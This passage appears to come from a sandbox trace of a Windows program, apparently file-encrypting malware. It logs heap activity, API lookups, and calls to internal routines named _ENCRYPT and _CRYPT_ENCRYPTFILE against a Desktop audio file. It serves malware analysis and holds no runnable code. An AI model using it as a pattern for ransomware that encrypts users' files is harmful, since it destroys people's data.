(in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.342] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.343] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.343] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.343] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0076.344] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0076.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.344] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.344] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.345] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.345] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.346] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e708 [0076.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.346] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0076.346] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.346] CloseHandle (hObject=0x128) returned 1 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0076.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.347] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.348] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0076.348] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0076.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.348] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0076.349] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0076.349] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0076.349] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0076.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.349] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.349] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.349] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.349] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361d4d90, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x9aa79520, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0x9aa79520, ftLastWriteTime.dwHighDateTime=0x1d5da15, nFileSizeHigh=0x0, nFileSizeLow=0x8577, dwReserved0=0x0, dwReserved1=0x657690, cFileName="7TIqi.m4a", cAlternateFileName="")) returned 0x6b89b8 [0076.350] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.350] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.350] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361d4d90, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x9aa79520, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0x9aa79520, ftLastWriteTime.dwHighDateTime=0x1d5da15, nFileSizeHigh=0x0, nFileSizeLow=0x8577, dwReserved0=0x0, dwReserved1=0x657690, cFileName="7TIqi.m4a", cAlternateFileName="")) returned 0x6b89b8 [0076.350] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0076.350] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0076.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7TIqi.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0076.352] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.352] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0076.352] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.352] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.352] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.352] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.352] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) 